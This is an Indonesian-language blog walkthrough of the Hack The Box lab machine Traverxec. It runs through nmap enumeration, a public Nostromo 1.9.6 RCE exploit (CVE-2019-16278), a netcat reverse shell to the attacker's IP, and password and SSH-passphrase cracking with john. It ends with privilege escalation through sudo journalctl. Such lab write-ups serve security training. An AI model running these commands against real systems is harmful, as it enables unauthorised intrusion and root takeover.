Traverxec – [Hack The Box] Walkthrough
Hack The Box?
Berhubung ini adalah artikel pertama yang saya buat di blog ini, maka saya akan sedikit menjelaskan dulu apa itu Hack The Box.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.
Singkatnya, HTB adalah online platform yang memungkinkan kita untuk menguji kemampuan penetration testing pada lab yang telah disediakan dan akan selalu di perbaharui.
Selain menyediakan lab untuk meretas machine, HTB juga mempunyai beberapa tantangan lainnya, contohnya Capture The Flag (CTF).
Nah kali ini saya akan membahas salah satu machine yang bernama Traverxec.
Machine Details
- OS : Linux
- Difficulty : Easy
- Points : 20
- Release : 16 Nov 2019
- IP : 10.10.10.165
Reconnaisance & Enumeration
Pertama lakukan enumerasi menggunakan nmap untuk mendapatkan informasi lebih lanjut tentang service yang tersedia pada machine ini.
1
nmap -sV -sC 10.10.10.165
Setelah menunggu, berikut adalah hasil yang didapatkan dari nmap.
Terdapat beberapa service yang terbuka yaitu SSH dan HTTP dan menggunakan Nostromo v.1.9.6 sebagai web servernya. Saat web dibuka ternyata hanya menampilkan sebuah website statis.
Setelah mencari tau lebih lanjut tentang nostromo 1.9.6 ternyata server yang digunakan mempunyai bug Directory Traversal yang bisa mengarah ke serangan RCE via crafted HTTP request.
Referensi : CVE-2019-16278.
Gaining Access
Kebetulan sudah ada exploit yang dibuat oleh seorang pentester yang bisa di dapatkan di
exploit-db nostromo 1.9.6 – Remote Code Execution. Langsung saja kita jalankan exploit tersebut.
1
python cve2019_16278.py 10.10.10.165 80 "uname -a"
Terlihat bahwa server me-response command “uname -a” yang di berikan. Untuk mempermudah maka kita akan lakukan reverse shell ke server tersebut. Pertama listen netcat di local.
1
nc -lvp 1131
Lalu lakukan reverse shell ke server
1
python cve2019_16278.py 10.10.10.165 80 "/bin/nc.traditional -e /bin/sh 10.10.14.76 1131"
Shell sudah terkoneksi, lalu spawn pty shell menggunakan python agar bash lebih enak dilihat
1
python -c 'import pty; pty.spawn("/bin/bash")'
Sesuai dengan soalnya, pertama kita harus mendapatkan flag user (user.txt) yang terdapat di direktori /home/{user}/
Namun saat membuka direktorinya ternyata kita tidak mempunyai akses ke direktori tersebut, terpaksa harus mencari cara lain agar bisa mengakses flag tersebut.
Setelah mencari cari , ditemukan file .htpasswd dan nhttpd.conf nya di direktori /var/www/nostromo/conf
Crack htpasswd tersebut menggunakan john dengan wordlist rockyou.txt dan didapatkan plaintext dari passwordnya si david, yaitu : Nowonly4me
Lanjut cek isi dari nhttpd.conf nya, dan ditemukan HOMDIRS di /home/public_www dan setelah di cek isinya terdapat ‘protected-file-area’
Didalam folder tersebut berisi backup-ssh yang mungkin bisa dipakai untuk login ke ssh target
Untuk mendapatkan file tersebut ternyata kita bisa melakukan cara lain. Jadi rencana nya nanti kita akan membuat file berdasarkan base64 yang telah di encode tadi lalu di decode kembali agar file nya kembali seperti semula.
Referensi : Gzip Base64 Encode
1
cat backup-ssh-identity-files.tgz | base64 –w0
Buat file yang berisi base64 tersebut dan men-decode nya seperti semula
1
cat encoded_ssh.txt | base64 -d > backup-ssh-identity-files.tgz
Terdapat beberapa file ssh didalam zip, namun key tersebut menggunakan passphare . Untuk crack passphare dari id_rsa tersebut kita bisa menggunakan john. Namun id_rsa harus dirubah menjadi hash terlebih dahulu menggunakan ssh2john.
1
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
Lalu crack passphare nya menggunakan wordlist rockyou.txt
1
john id_rsa.hash --wordlist=/home/bio/netsec/wordlists/rockyou.txt
Passphare berhasil di dapatkan :
hunter (id_rsa)
Langsung saja connect ke SSH menggunakan key dan passphare yang sudah di dapatkan.
Akhirnya, kita berhasil login ke dalam machine tersebut sebagai david, maka flag user berhasil di dapatkan.
Privilege Escalation
Nah, sekarang saatnya untuk mendapatkan flag root (root.txt) nya yang berada di /root/.
Setelah melihat isi direktori home nya si david, terdapat folder bin yang berisi file script yang sepertinya untuk melihat status dari server webnya.
Setelah mencari informasi ternyata journalctl bisa di eksploitasi, ketika ukuran layar terminal dikecilkan maka output dari file tidak akan tampil seutuhnya dan otomatis menjalankan fungsi/command “less” yang bisa digunakan untuk melakukan command didalam shell.
Referensi :
Karna journalctl tadi dijalankan langsung menggunakan sudo (/usr/bin/sudo) maka journalctl mempunyai permission dari superuser.
Akhirnya akses root pun berhasil kita dapatkan, dan selesailah misi kita pada kali ini.